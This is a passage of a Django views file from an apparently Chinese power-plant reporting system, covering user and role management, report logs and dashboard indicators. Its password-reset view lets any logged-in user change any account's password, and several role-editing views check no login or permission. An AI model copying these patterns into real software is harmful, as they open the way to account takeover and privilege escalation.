pnode=oldpuserinfo).filter(sort__gt=oldsort)\n\n puserinfo = UserInfo.objects.get(id=parent)\n sort = position + 1\n userinfos = UserInfo.objects.filter(pnode=puserinfo).filter(sort__gte=sort).exclude(id=id).exclude(\n state=\"9\")\n\n myuserinfo = UserInfo.objects.get(id=id)\n if puserinfo.usertype == \"user\":\n return HttpResponse(\"类型\")\n else:\n usersame = UserInfo.objects.filter(pnode=puserinfo).filter(fullname=myuserinfo.fullname).exclude(\n id=id).exclude(state=\"9\")\n if (len(usersame) > 0):\n return HttpResponse(\"重名\")\n else:\n if (len(olduserinfos) > 0):\n for olduserinfo in olduserinfos:\n try:\n olduserinfo.sort = olduserinfo.sort - 1\n olduserinfo.save()\n except:\n pass\n if (len(userinfos) > 0):\n for userinfo in userinfos:\n try:\n userinfo.sort = userinfo.sort + 1\n userinfo.save()\n except:\n pass\n\n try:\n myuserinfo.pnode = puserinfo\n myuserinfo.sort = sort\n myuserinfo.save()\n except:\n pass\n if parent != old_parent:\n return HttpResponse(puserinfo.fullname + \"^\" + str(puserinfo.id))\n else:\n return HttpResponse(\"0\")\n\n\ndef orgpassword(request):\n if request.user.is_authenticated():\n if 'id' in request.POST:\n id = request.POST.get('id')\n password1 = request.POST.get('password1')\n password2 = request.POST.get('password2')\n try:\n offset = int(id)\n userinfo = UserInfo.objects.get(id=id)\n user = userinfo.user\n user.set_password(password1)\n user.save()\n return HttpResponse(\"1\")\n except:\n HttpResponse('修改密码失败,请于管理员联系。')\n\n\ndef group(request, funid):\n if request.user.is_authenticated():\n try:\n allgroup = Group.objects.exclude(state=\"9\")\n\n return render(request, 'group.html',\n {'username': request.user.userinfo.fullname,\n \"allgroup\": allgroup, \"pagefuns\": getpagefuns(funid, request)})\n except:\n return HttpResponseRedirect(\"/index\")\n else:\n return HttpResponseRedirect(\"/login\")\n\n\ndef groupsave(request):\n if 'id' in request.POST:\n result = {}\n id = request.POST.get('id', '')\n name = request.POST.get('name', '')\n remark = request.POST.get('remark', '')\n try:\n id = int(id)\n except:\n raise Http404()\n if name.strip() == '':\n result[\"res\"] = '角色名称不能为空。'\n else:\n if id == 0:\n allgroup = Group.objects.filter(name=name).exclude(state=\"9\")\n if (len(allgroup) > 0):\n result[\"res\"] = name + '已存在。'\n else:\n groupsave = Group()\n groupsave.name = name\n groupsave.remark = remark\n groupsave.save()\n result[\"res\"] = \"新增成功。\"\n result[\"data\"] = groupsave.id\n else:\n allgroup = Group.objects.filter(\n name=name).exclude(id=id).exclude(state=\"9\")\n if (len(allgroup) > 0):\n result[\"res\"] = name + '已存在。'\n else:\n try:\n groupsave = Group.objects.get(id=id)\n groupsave.name = name\n groupsave.remark = remark\n groupsave.save()\n result[\"res\"] = \"修改成功。\"\n except:\n result[\"res\"] = \"修改失败。\"\n return HttpResponse(json.dumps(result))\n\n\ndef groupdel(request):\n if 'id' in request.POST:\n result = \"\"\n id = request.POST.get('id', '')\n try:\n id = int(id)\n except:\n raise Http404()\n allgroup = Group.objects.filter(id=id)\n result = '角色不存在。'\n if (len(allgroup) > 0):\n groupsave = allgroup[0]\n groupsave.state = \"9\"\n groupsave.save()\n result = \"删除成功。\"\n else:\n result = '角色不存在。'\n return HttpResponse(result)\n\n\ndef getusertree(request):\n if 'id' in request.POST:\n id = request.POST.get('id', '')\n try:\n id = int(id)\n except:\n raise Http404()\n\n treedata = []\n groupsave = Group.objects.get(id=id)\n selectusers = groupsave.userinfo_set.exclude(state=\"9\")\n\n rootnodes = UserInfo.objects.order_by(\"sort\").exclude(\n state=\"9\").filter(pnode=None, usertype=\"org\")\n\n if len(rootnodes) > 0:\n for rootnode in rootnodes:\n root = {}\n root[\"text\"] = rootnode.fullname\n root[\"id\"] = \"user_\" + str(rootnode.id)\n root[\"type\"] = \"org\"\n root[\"state\"] = {\"opened\": True}\n root[\"children\"] = group_get_user_tree(rootnode, selectusers)\n treedata.append(root)\n treedata = json.dumps(treedata)\n return HttpResponse(treedata)\n\n\ndef groupsaveusertree(request):\n if 'id' in request.POST:\n id = request.POST.get('id', '')\n selectedusers = request.POST.get('selecteduser', '')\n selectedusers = selectedusers.split(',')\n\n try:\n id = int(id)\n except:\n raise Http404()\n groupsave = Group.objects.get(id=id)\n groupsave.userinfo_set.clear()\n if len(selectedusers) > 0:\n for selecteduser in selectedusers:\n try:\n myuser = UserInfo.objects.get(\n id=int(selecteduser.replace(\"user_\", \"\")))\n if myuser.usertype == \"user\":\n myuser.group.add(groupsave)\n except:\n pass\n return HttpResponse(\"保存成功。\")\n\n\ndef getfuntree(request):\n if 'id' in request.POST:\n id = request.POST.get('id', '')\n try:\n id = int(id)\n except:\n raise Http404()\n\n treedata = []\n groupsave = Group.objects.get(id=id)\n selectfuns = groupsave.fun.exclude(state=\"9\")\n\n rootnodes = Fun.objects.order_by(\n \"sort\").filter(pnode=None, funtype=\"node\")\n\n if len(rootnodes) > 0:\n for rootnode in rootnodes:\n root = {}\n root[\"text\"] = rootnode.name\n root[\"id\"] = \"fun_\" + str(rootnode.id)\n root[\"type\"] = \"node\"\n root[\"state\"] = {\"opened\": True}\n root[\"children\"] = group_get_fun_tree(rootnode, selectfuns)\n treedata.append(root)\n treedata = json.dumps(treedata)\n return HttpResponse(treedata)\n\n\ndef groupsavefuntree(request):\n if 'id' in request.POST:\n id = request.POST.get('id', '')\n selectedfuns = request.POST.get('selectedfun', '')\n selectedfuns = selectedfuns.split(',')\n\n try:\n id = int(id)\n except:\n raise Http404()\n groupsave = Group.objects.get(id=id)\n groupsave.fun.clear()\n if len(selectedfuns) > 0:\n for selectedfun in selectedfuns:\n try:\n myfun = Fun.objects.get(\n id=int(selectedfun.replace(\"fun_\", \"\")))\n if myfun.funtype == \"fun\":\n groupsave.fun.add(myfun)\n except:\n pass\n return HttpResponse(\"保存成功。\")\n\n\ndef get_format_date(pre_date, c_cycletype, type=\"C\"):\n \"\"\"格式化日期\n\n Args:\n pre_date (datetime): 格式化前日期\n cycletype (int): 周期类型\n type (string): 响应类型:C中文 E英文\n\n Returns:\n [datetime]: [格式化后日期]\n \"\"\"\n format_date = \"\"\n try:\n if type == \"C\":\n if c_cycletype == \"10\":\n format_date = pre_date.strftime('%Y{y}%m{m}%d{d}').format(y='年', m='月', d='日')\n if c_cycletype == \"11\":\n format_date = pre_date.strftime('%Y{y}%m{m}').format(y='年', m='月')\n if c_cycletype == \"12\":\n format_date = pre_date.strftime('%Y{y} {q}').format(y='年', q='第{0}季度'.format(\n (pre_date.month - 1) // 3 + 1))\n if c_cycletype == \"13\":\n if pre_date.month <= 6:\n p = \"上\"\n else:\n p = \"下\"\n format_date = pre_date.strftime('%Y{y} {p}').format(y='年', p='{0}半年'.format(p))\n if c_cycletype == \"14\":\n format_date = pre_date.strftime('%Y{y}').format(y='年')\n else:\n if c_cycletype in [\"10\", \"12\", \"13\"]: # 日 季 半年\n format_date = \"{:%Y-%m-%d}\".format(pre_date)\n if c_cycletype == \"11\": # 月\n format_date = \"{:%Y-%m}\".format(pre_date)\n if c_cycletype == \"14\": # 年\n format_date = \"{:%Y}\".format(pre_date)\n except Exception as e:\n print(e)\n\n return format_date\n\n\ndef get_reporting_log(request):\n if request.user.is_authenticated():\n reporting_log = ReportingLog.objects.exclude(state='9').order_by('-id').select_related('adminapp', 'work')\n reporting_type_dict = {\n 'del': '删除',\n 'release': '发布',\n 'save': '保存',\n 'cancelrelease': '取消发布'\n }\n\n dict_list = DictList.objects.exclude(state='9').values()\n reporting_log_list = []\n\n for num, rl in enumerate(reporting_log):\n user = rl.user.userinfo.fullname if rl.user.userinfo else ''\n app = rl.adminapp.name if rl.adminapp else ''\n work = rl.work.name if rl.work else ''\n cycletype = int(rl.cycletype)\n for dl in dict_list:\n if cycletype == dl['id']:\n cycletype = dl['name']\n break\n reporting_type = ''\n try:\n reporting_type = reporting_type_dict[rl.type]\n except:\n pass\n time = ''\n try:\n time = '{:%Y-%m-%d %H:%M:%S}'.format(rl.write_time)\n except:\n pass\n\n # 报表时间 \n datadate = rl.datadate\n\n # 日报 月报 季报 半年报 年报\n # 2020年01月01日 日报\n # 2020年01月 月报\n # 2020年 第1季度 季报\n # 2020年 上半年/下半年 半年报\n # 2020年 年报\n\n datadate = get_format_date(datadate, rl.cycletype)\n user = '{0}'.format(user)\n datadate = '{0}'.format(datadate)\n app = '{0}'.format(app)\n work = '{0}'.format(work)\n operationtype = '{0}'.format(map_operation(rl.operationtype, True)) if rl.operationtype else \"\"\n log = '{user}{reporting_type}{app}{work}{datadate}{cycletype}报{operationtype}数据。'.format(**{\n 'user': user,\n 'app': app,\n 'work': work if work else '',\n 'reporting_type': reporting_type,\n 'cycletype': cycletype,\n 'operationtype': operationtype,\n 'datadate': datadate\n })\n # 黄展翔 发布 动力中心经营统计计划部填报 2020-01-02日报数据\n reporting_log_list.append({\n 'time': time,\n 'log': log\n })\n if num > 50:\n break\n return JsonResponse({\n 'data': reporting_log_list\n })\n else:\n return HttpResponseRedirect('/login')\n\n\ndef reporting_log_index(request, funid):\n if request.user.is_authenticated():\n start_time = (datetime.datetime.now() - datetime.timedelta(days=30)).strftime(\"%Y-%m-%d\")\n end_time = datetime.datetime.now().strftime(\"%Y-%m-%d\")\n return render(request, 'reporting_log.html',\n {'username': request.user.userinfo.fullname,\n \"pagefuns\": getpagefuns(funid,request),\n \"start_time\": start_time,\n \"end_time\": end_time,\n })\n else:\n return HttpResponseRedirect(\"/login\")\n\n\ndef reporting_log_data(request):\n if request.user.is_authenticated():\n start_time = request.GET.get('start_time', '')\n end_time = request.GET.get('end_time', '')\n end_time = datetime.datetime.strptime(end_time, \"%Y-%m-%d\") + datetime.timedelta(days=1)\n reporting_log = ReportingLog.objects.exclude(state='9').order_by('-id').select_related('adminapp', 'work')\\\n .filter(write_time__range=[start_time, end_time])\n reporting_type_dict = {\n 'del': '删除',\n 'release': '发布',\n 'save': '保存',\n 'cancelrelease': '取消发布'\n }\n\n dict_list = DictList.objects.exclude(state='9').values()\n reporting_log_list = []\n\n for rl in reporting_log:\n user = rl.user.userinfo.fullname if rl.user.userinfo else ''\n app = rl.adminapp.name if rl.adminapp else ''\n work = rl.work.name if rl.work else ''\n cycletype = int(rl.cycletype)\n for dl in dict_list:\n if cycletype == dl['id']:\n cycletype = dl['name']\n break\n reporting_type = ''\n try:\n reporting_type = reporting_type_dict[rl.type]\n except:\n pass\n write_time = ''\n try:\n write_time = '{:%Y-%m-%d %H:%M:%S}'.format(rl.write_time)\n except:\n pass\n\n # 报表时间\n datadate = rl.datadate\n\n datadate = get_format_date(datadate, rl.cycletype)\n user_no_color = user\n user = '{0}'.format(user)\n datadate = '{0}'.format(datadate)\n app = '{0}'.format(app)\n work = '{0}'.format(work)\n operationtype = '{0}'.format(map_operation(rl.operationtype, True)) if rl.operationtype else \"\"\n log = '{user}{reporting_type}{app}{work}{datadate}{cycletype}报{operationtype}数据。'.format(**{\n 'user': user,\n 'app': app,\n 'work': work if work else '',\n 'reporting_type': reporting_type,\n 'cycletype': cycletype,\n 'operationtype': operationtype,\n 'datadate': datadate\n })\n reporting_log_list.append({\n 'write_time': write_time,\n 'log': log,\n 'user': user_no_color,\n 'id': rl.id\n\n })\n return JsonResponse({\n 'data': reporting_log_list\n })\n else:\n return HttpResponseRedirect('/login')\n\n\n# 更新数据记录\ndef update_data_log_index(request, funid):\n if request.user.is_authenticated():\n start_time = (datetime.datetime.now() - datetime.timedelta(days=365)).strftime(\"%Y-%m\")\n end_time = datetime.datetime.now().strftime(\"%Y-%m\")\n\n try:\n cur_fun = Fun.objects.filter(id=int(funid)).exclude(state='9')\n adminapp = cur_fun[0].app\n except:\n return HttpResponseRedirect(\"/index\")\n return render(request, 'update_data_log.html',\n {'username': request.user.userinfo.fullname,\n \"pagefuns\": getpagefuns(funid, request),\n \"start_time\": start_time,\n \"end_time\": end_time,\n \"adminapp\": adminapp.id if adminapp else '',\n })\n else:\n return HttpResponseRedirect(\"/login\")\n\n\ndef update_data_log_data(request):\n if request.user.is_authenticated():\n adminapp = request.GET.get('adminapp', '')\n start_time = request.GET.get('start_time', '')\n end_time = request.GET.get('end_time', '')\n\n start_time = datetime.datetime.strptime(start_time, \"%Y-%m\")\n end_time = datetime.datetime.strptime(end_time, \"%Y-%m\") + datetime.timedelta(days=30)\n try:\n adminapp = int(adminapp)\n except:\n pass\n update_data_log = UpdateDataLog.objects.exclude(state='9').order_by('-id').select_related('adminapp', 'work', 'target')\\\n .filter(write_time__range=[start_time, end_time],adminapp_id=adminapp)\n dict_list = DictList.objects.exclude(state='9').values()\n reporting_log_list = []\n\n for rl in update_data_log:\n user = rl.user.userinfo.fullname if rl.user.userinfo else ''\n app = rl.adminapp.name if rl.adminapp else ''\n work = rl.work.name if rl.work else ''\n target_name = rl.target.name if rl.target else ''\n before_curvalue = round(rl.before_curvalue, rl.target.digit)\n after_curvalue = round(rl.after_curvalue, rl.target.digit)\n datadate = get_format_date(rl.datadate, rl.cycletype)\n cycletype = int(rl.cycletype)\n for dl in dict_list:\n if cycletype == dl['id']:\n cycletype = dl['name']\n break\n write_time = ''\n try:\n write_time = '{:%Y-%m-%d %H:%M:%S}'.format(rl.write_time)\n except:\n pass\n operationtype = map_operation(rl.operationtype, True) if rl.operationtype else \"\"\n reporting_log_list.append({\n 'id': rl.id,\n 'target_name': target_name,\n 'cycletype': cycletype,\n 'operationtype': operationtype,\n 'datadate': datadate,\n 'write_time': write_time,\n 'user': user,\n 'app': app,\n 'work': work,\n 'before_curvalue': before_curvalue,\n 'after_curvalue': after_curvalue,\n })\n return JsonResponse({\n 'data': reporting_log_list\n })\n else:\n return HttpResponseRedirect('/login')\n\n\ndef get_month_fdl(request):\n \"\"\"\n 一个月内 新厂、动力中心、老厂 所有机组:全场 分机组 的发电量曲线\n :param request:\n :return:\n \"\"\"\n if request.user.is_authenticated():\n def get_target_30days_value_queryset(date, target):\n \"\"\"\n 处理隔年问题\n :param date:\n :param target:\n :return:\n \"\"\"\n target_30days_values = []\n operation_type = target.operationtype\n date_year = date.year\n target_values = []\n if operation_type == \"1\":\n target_values = getmodels(\"Meterdata\", str(date.year)).objects.exclude(state=\"9\").filter(target__cycletype=10).filter(target=target).values(\"curvalue\", \"datadate\")\n if operation_type == \"15\":\n target_values = getmodels(\"Entrydata\", str(date.year)).objects.exclude(state=\"9\").filter(target__cycletype=10).filter(target=target).values(\"curvalue\", \"datadate\")\n if operation_type == \"16\":\n target_values = getmodels(\"Extractdata\", str(date.year)).objects.exclude(state=\"9\").filter(target__cycletype=10).filter(target=target).values(\"curvalue\",\n \"datadate\")\n if operation_type == \"17\":\n target_values = getmodels(\"Calculatedata\", str(date.year)).objects.exclude(state=\"9\").filter(target__cycletype=10).filter(target=target).values(\"curvalue\",\n \"datadate\")\n\n for i in range(1, 31):\n # 并非同一年,重新取数\n if date.year != date_year:\n if operation_type == \"1\":\n target_values = getmodels(\"Meterdata\", str(date.year)).objects.exclude(state=\"9\").filter(target__cycletype=10).filter(target=target).values(\n \"curvalue\", \"datadate\"\n )\n if operation_type == \"15\":\n target_values = getmodels(\"Entrydata\", str(date.year)).objects.exclude(state=\"9\").filter(target__cycletype=10).filter(target=target).values(\n \"curvalue\", \"datadate\"\n )\n if operation_type == \"16\":\n target_values = getmodels(\"Extractdata\", str(date.year)).objects.exclude(state=\"9\").filter(target__cycletype=10).filter(target=target).values(\n \"curvalue\", \"datadate\"\n )\n if operation_type == \"17\":\n target_values = getmodels(\"Calculatedata\", str(date.year)).objects.exclude(state=\"9\").filter(target__cycletype=10).filter(target=target).values(\n \"curvalue\", \"datadate\"\n )\n target_value = 0\n for tv in target_values:\n if \"{0:%Y-%m-%d}\".format(tv[\"datadate\"]) == \"{0:%Y-%m-%d}\".format(date):\n target_value = float(tv[\"curvalue\"]) if tv[\"curvalue\"] else 0\n break\n target_30days_values.append(target_value)\n date -= datetime.timedelta(days=1)\n\n return target_30days_values\n\n def get_categories(date):\n categories = []\n for i in range(1, 31):\n categories.append(\"{0:%Y-%m-%d}\".format(date))\n date -= datetime.timedelta(days=1)\n\n return categories\n\n # 老厂经营统计\n # FD_11_01(电表走字) FD_12_01(电表走字) FDL_9F(计算)\n # 动力中心经营统计\n # DLZX_JYTJ_01_FDL(计算) DLZX_JYTJ_02_FDL(计算) DLZX_JYTJ_FDL(计算)\n # 新厂经营统计\n # NEW_JYTJ_01_FDL NEW_JYTJ_02_FDL NEW_JYTJ_FDL\n today = datetime.datetime.now()\n # today = datetime.datetime.strptime(\"2020-01-31\", \"%Y-%m-%d\")\n\n dlzx_fdl_code_list = [\"DLZX_JYTJ_01_FDL\", \"DLZX_JYTJ_02_FDL\", \"DLZX_JYTJ_FDL\"]\n lc_fdl_code_list = [\"FD_11_01\", \"FD_12_01\", \"FDL_9F\"]\n xc_fdl_code_list = [\"NEW_JYTJ_01_FDL\", \"NEW_JYTJ_02_FDL\", \"NEW_JYTJ_FDL\"]\n colors = [\"#3598dc\", \"#e7505a\", \"#32c5d2\", \"#67809F\", \"#f3c200\"]\n\n dlzx = []\n lc = []\n xc = []\n\n for num, fdl_code in enumerate(dlzx_fdl_code_list):\n targets = Target.objects.exclude(state=\"9\").filter(code=fdl_code)\n if targets.exists:\n target = targets[0]\n target_30days_values = get_target_30days_value_queryset(today, target)\n color = \"#3598dc\"\n try:\n color = colors[num]\n except Exception:\n pass\n\n dlzx.append({\n \"name\": target.name,\n \"color\": color,\n \"fdl\": target_30days_values\n })\n for num, fdl_code in enumerate(lc_fdl_code_list):\n targets = Target.objects.exclude(state=\"9\").filter(code=fdl_code)\n if targets.exists:\n target = targets[0]\n target_30days_values = get_target_30days_value_queryset(today, target)\n color = \"#3598dc\"\n try:\n color = colors[num]\n except Exception:\n pass\n\n lc.append({\n \"name\": target.name,\n \"color\": color,\n \"fdl\": target_30days_values\n })\n for num, fdl_code in enumerate(xc_fdl_code_list):\n targets = Target.objects.exclude(state=\"9\").filter(code=fdl_code)\n if targets.exists:\n target = targets[0]\n target_30days_values = get_target_30days_value_queryset(today, target)\n color = \"#3598dc\"\n try:\n color = colors[num]\n except Exception:\n pass\n\n xc.append({\n \"name\": target.name,\n \"color\": color,\n \"fdl\": target_30days_values\n })\n\n categories = get_categories(today)\n return JsonResponse({\n \"DLZX_JYTJ\": {\n \"fld_list\": dlzx,\n \"categories\": categories\n },\n \"LC_JYTJ\": {\n \"fld_list\": lc,\n \"categories\": categories\n },\n \"XC_JYTJ\": {\n \"fld_list\": xc,\n \"categories\": categories\n }\n })\n else:\n return HttpResponseRedirect(\"/login\")\n\n\ndef get_target_data_recently(code):\n \"\"\"\n 获取指标 最近有数据的一天的数据\n :param code:\n :return appointed_time_object:\n \"\"\"\n data = {\n \"target_name\": \"\",\n \"unit\": \"\",\n \"curvalue\": 0,\n \"cumulativemonth\": 0,\n \"cumulativeyear\": 0\n }\n\n model_map = {\n \"1\": \"Meterdata\",\n \"15\": \"Entrydata\",\n \"16\": \"Extractdata\",\n \"17\": \"Calculatedata\",\n }\n targets = Target.objects.exclude(state=\"9\").filter(code=code)\n if targets.exists():\n target = targets[0]\n operation_type = target.operationtype\n digit = target.digit\n\n data[\"unit\"] = target.unity\n data[\"target_name\"] = target.name\n\n model_name = \"\"\n try:\n model_name = model_map[operation_type]\n except Exception:\n pass\n # 操作类型: 计算、提取、录入、电表走字\n now_time = datetime.datetime.now()\n for i in range(1, 3): # 2年内\n recent_object = getmodels(model_name, str(now_time.year)).objects.exclude(state=\"9\").filter(\n target=target\n ).last()\n if recent_object:\n curvalue = 0\n cumulativemonth = 0\n cumulativeyear = 0\n\n try:\n curvalue = float(round(recent_object.curvalue, digit))\n except Exception:\n pass\n try:\n cumulativemonth = float(round(recent_object.cumulativemonth, digit))\n except Exception:\n pass\n try:\n cumulativeyear = float(round(recent_object.cumulativeyear, digit))\n except Exception:\n pass\n\n data[\"curvalue\"] = curvalue\n data[\"cumulativemonth\"] = cumulativemonth\n data[\"cumulativeyear\"] = cumulativeyear\n break\n now_time = now_time - datetime.timedelta(days=1)\n else:\n data[\"curvalue\"] = 0\n data[\"cumulativemonth\"] = 0\n data[\"cumulativeyear\"] = 0\n\n return data\n\n\ndef get_appointed_time_data(code, appointed_time):\n \"\"\"\n 获取指标指定时间的数据对象\n :param code:\n :param appointed_time:\n :return appointed_time_object:\n \"\"\"\n data = {\n \"target_name\": \"\",\n \"curvalue\": 0,\n \"cumulativemonth\": 0,\n \"cumulativeyear\": 0\n }\n\n model_map = {\n \"1\": \"Meterdata\",\n \"15\": \"Entrydata\",\n \"16\": \"Extractdata\",\n \"17\": \"Calculatedata\",\n }\n targets = Target.objects.exclude(state=\"9\").filter(code=code)\n if targets.exists():\n target = targets[0]\n operation_type = target.operationtype\n digit = target.digit\n appointed_time_object = []\n\n model_name = \"\"\n try:\n model_name = model_map[operation_type]\n except Exception:\n pass\n # 操作类型: 计算、提取、录入、电表走字\n appointed_time_object = getmodels(model_name, str(appointed_time.year)).objects.exclude(state=\"9\").filter(\n datadate=appointed_time.date()\n ).filter(target=target)\n\n if appointed_time_object:\n appointed_time_object = appointed_time_object[0]\n\n curvalue = 0\n cumulativemonth = 0\n cumulativeyear = 0\n\n try:\n curvalue = float(round(appointed_time_object.curvalue, digit))\n except Exception:\n pass\n try:\n cumulativemonth = float(round(appointed_time_object.cumulativemonth, digit))\n except Exception:\n pass\n try:\n cumulativeyear = float(round(appointed_time_object.cumulativeyear, digit))\n except Exception:\n pass\n data = {\n \"target_name\": target.name,\n \"curvalue\": curvalue,\n \"cumulativemonth\": cumulativemonth,\n \"cumulativeyear\": cumulativeyear\n }\n else:\n data = {\n \"target_name\": target.name,\n \"curvalue\": 0,\n \"cumulativemonth\": 0,\n \"cumulativeyear\": 0\n }\n\n return data\n\n\ndef get_important_targets(request):\n \"\"\"\n 获取燃热、煤机、9F重要指标 最近有数据的一天\n 煤机:发电量、上网电量、供热量、耗煤量、负荷率、厂用电率、发电标煤耗、供电标煤耗、供热标煤耗\n 燃热:发电量、上网电量、供热量、负荷率、厂用电率、发电标煤耗、供电标煤耗、供热标煤耗 -> 没有耗煤量\n 9F:发电量、上网电量、耗气量、负荷率、厂用电率、发电标煤耗、供电标煤耗\n 发电量月计划、上网电量月计划\n \"\"\"\n if request.user.is_authenticated():\n status = 1\n data = {\n \"RR\": {\n \"JYZB\": [\n {\"target\": \"DLZX_JYTJ_FDL\", \"v_type\": \"cumulativeyear\", \"value\": 0},\n {\"target\": \"DLZX_JYTJ_SWDL\", \"v_type\": \"cumulativeyear\", \"value\": 0},\n {\"target\": \"DLZX_JYTJ_ZGRL_NEW\", \"v_type\": \"cumulativeyear\", \"value\": 0},\n {\"target\": \"DLZX_JYTJ_FHL_Y\", \"v_type\": \"curvalue\", \"value\": 0},\n {\"target\": \"DLZX_JYTJ_ZHCYDL_Y\", \"v_type\": \"curvalue\", \"value\": 0},\n {\"target\": \"DLZX_JYTJ_FDBZMH_Y\", \"v_type\": \"curvalue\", \"value\": 0},\n {\"target\": \"DLZX_JYTJ_GDBZMH_Y\", \"v_type\": \"curvalue\", \"value\": 0},\n {\"target\": \"DLZX_JYTJ_GRBZMH_Y\", \"v_type\": \"curvalue\", \"value\": 0}\n ],\n \"HBZB\": [\n {\"target\": \"DLZX_HB_01_RJPFND_SO2\", \"v_type\": \"curvalue\", \"value\": 0},\n {\"target\": \"DLZX_HB_02_RJPFND_SO2\", \"v_type\": \"curvalue\", \"value\": 0},\n {\"target\": \"DLZX_HB_01_RJ_SO2\", \"v_type\": \"curvalue\", \"value\": 0},\n {\"target\": \"DLZX_HB_02_RJ_SO2\", \"v_type\": \"curvalue\", \"value\": 0},\n {\"target\": \"DLZX_HB_01_RJ_YQPFL\", \"v_type\": \"curvalue\", \"value\": 0},\n {\"target\": \"DLZX_HB_02_RJ_YQPFL\", \"v_type\": \"curvalue\", \"value\": 0},\n {\"target\": \"DLZX_HB_01_RJPFND_NOx\", \"v_type\": \"curvalue\", \"value\": 0},\n {\"target\": \"DLZX_HB_02_RJPFND_NOx\", \"v_type\": \"curvalue\", \"value\": 0},\n {\"target\": \"DLZX_HB_01_RJ_NOx\", \"v_type\": \"curvalue\", \"value\": 0},\n {\"target\": \"DLZX_HB_02_RJ_NOx\", \"v_type\": \"curvalue\", \"value\": 0}\n ],\n \"FDL_JH\": [\n [ # 发电量年计划\n {\"target\": \"DLZX_JYTJ_FDL_NJH\", \"v_type\": \"curvalue\", \"value\": 0}, # 计划\n {\"target\": \"DLZX_JYTJ_FDL\", \"v_type\": \"cumulativeyear\", \"value\": 0} # 已完成\n ],\n [ # 上网电量年计划\n {\"target\": \"DLZX_JYTJ_SWDL_NJH\", \"v_type\": \"curvalue\", \"value\": 0}, # 计划\n {\"target\": \"DLZX_JYTJ_SWDL\", \"v_type\": \"cumulativeyear\", \"value\": 0} # 已完成\n ],\n ]\n },\n \"MJ\": {\n \"JYZB\": [\n {\"target\": \"NEW_JYTJ_FDL\", \"v_type\": \"cumulativeyear\", \"value\": 0},\n {\"target\": \"NEW_JYTJ_SWDL\", \"v_type\": \"cumulativeyear\", \"value\": 0},\n {\"target\": \"NEW_JYTJ_GRL\", \"v_type\": \"cumulativeyear\", \"value\": 0},\n {\"target\": \"NEW_JYTJ_HML\", \"v_type\": \"cumulativeyear\", \"value\": 0},\n {\"target\": \"NEW_JYTJ_FHL_Y\", \"v_type\": \"curvalue\", \"value\": 0},\n {\"target\": \"NEW_JYTJ_ZHCYDL_Y\", \"v_type\": \"curvalue\", \"value\": 0},\n {\"target\": \"NEW_JYTJ_FDBZMH_Y\", \"v_type\": \"curvalue\", \"value\": 0},\n {\"target\": \"NEW_JYTJ_GDBZMH_Y\", \"v_type\": \"curvalue\", \"value\": 0},\n {\"target\": \"NEW_JYTJ_GRBZMH_Y\", \"v_type\": \"curvalue\", \"value\": 0}\n ],\n \"HBZB\": [\n {\"target\": \"NEW_HB_01_SO2ZSND\", \"v_type\": \"curvalue\", \"value\": 0},\n {\"target\": \"NEW_HB_02_SO2ZSND\", \"v_type\": \"curvalue\", \"value\": 0},\n {\"target\": \"NEW_HB_01_SO2PFL\", \"v_type\": \"curvalue\", \"value\": 0},\n {\"target\": \"NEW_HB_02_SO2PFL\", \"v_type\": \"curvalue\", \"value\": 0},\n {\"target\": \"NEW_HB_01_YCZSND\", \"v_type\": \"curvalue\", \"value\": 0},\n {\"target\": \"NEW_HB_02_YCZSND\", \"v_type\": \"curvalue\", \"value\": 0},\n {\"target\": \"NEW_HB_01_YCPFL\", \"v_type\": \"curvalue\", \"value\": 0},\n {\"target\": \"NEW_HB_02_YCPFL\", \"v_type\": \"curvalue\", \"value\": 0},\n {\"target\": \"NEW_HB_01_NOXZSND\", \"v_type\": \"curvalue\", \"value\": 0},\n {\"target\": \"NEW_HB_02_NOXZSND\", \"v_type\": \"curvalue\", \"value\": 0},\n {\"target\": \"NEW_HB_01_NOXPFL\", \"v_type\": \"curvalue\", \"value\": 0},\n {\"target\": \"NEW_HB_02_NOXPFL\", \"v_type\": \"curvalue\", \"value\": 0},\n {\"target\": \"NEW_HB_01_YQPFL\", \"v_type\": \"curvalue\", \"value\": 0},\n {\"target\": \"NEW_HB_02_YQPFL\", \"v_type\": \"curvalue\", \"value\": 0},\n ],\n \"FDL_JH\": [\n [ # 发电量年计划\n {\"target\": \"NEW_JYTJ_FDLNJH\", \"v_type\": \"curvalue\", \"value\": 0}, # 计划\n {\"target\": \"NEW_JYTJ_FDL\", \"v_type\": \"cumulativeyear\", \"value\": 0} # 已完成\n ],\n [ # 上网电量年计划\n {\"target\": \"NEW_JYTJ_SWDLNJH\", \"v_type\": \"curvalue\", \"value\": 0}, # 计划\n {\"target\": \"NEW_JYTJ_SWDL\", \"v_type\": \"cumulativeyear\", \"value\": 0} # 已完成\n ],\n ]\n },\n \"9F\": {\n \"JYZB\": [\n {\"target\": \"FDL_9F\", \"v_type\": \"cumulativeyear\", \"value\": 0},\n {\"target\": \"SWDL_9F\", \"v_type\": \"cumulativeyear\", \"value\": 0},\n {\"target\": \"FDHQ\", \"v_type\": \"cumulativeyear\", \"value\": 0},\n {\"target\": \"FHL_9F\", \"v_type\": \"cumulativeyear\", \"value\": 0},\n {\"target\": \"ZHCYDL_9F_Y\", \"v_type\": \"curvalue\", \"value\": 0},\n {\"target\": \"FDBZMHLV_9F_NLJ\", \"v_type\": \"curvalue\", \"value\": 0},\n {\"target\": \"ZHGDBZMHL_9F_Y\", \"v_type\": \"curvalue\", \"value\": 0,\n }],\n \"HBZB\": [\n {\"target\": \"OLD_HB_11_NOXPJSCND\", \"v_type\": \"curvalue\", \"value\": 0},\n {\"target\": \"OLD_HB_12_NOXPJSCND\", \"v_type\": \"curvalue\", \"value\": 0},\n {\"target\": \"OLD_HB_11_NOXPJZSND\", \"v_type\": \"curvalue\", \"value\": 0},\n {\"target\": \"OLD_HB_12_NOXPJZSND\", \"v_type\": \"curvalue\", \"value\": 0},\n {\"target\": \"OLD_HB_11_NOXPFL\", \"v_type\": \"curvalue\", \"value\": 0},\n {\"target\": \"OLD_HB_12_NOXPFL\", \"v_type\": \"curvalue\", \"value\": 0},\n {\"target\": \"OLD_HB_11_YQPFL\", \"v_type\": \"curvalue\", \"value\": 0},\n {\"target\": \"OLD_HB_12_YQPFL\", \"v_type\": \"curvalue\", \"value\": 0},\n ],\n \"FDL_JH\": [\n [ # 发电量年计划\n {\"target\": \"9F_FDL_NJH\", \"v_type\": \"curvalue\", \"value\": 0}, # 计划\n {\"target\": \"FDL_9F\", \"v_type\": \"cumulativeyear\", \"value\": 0} # 已完成\n ],\n [ # 上网电量年计划\n {\"target\": \"9F_SWDL_NJH\", \"v_type\": \"curvalue\", \"value\": 0}, # 计划\n 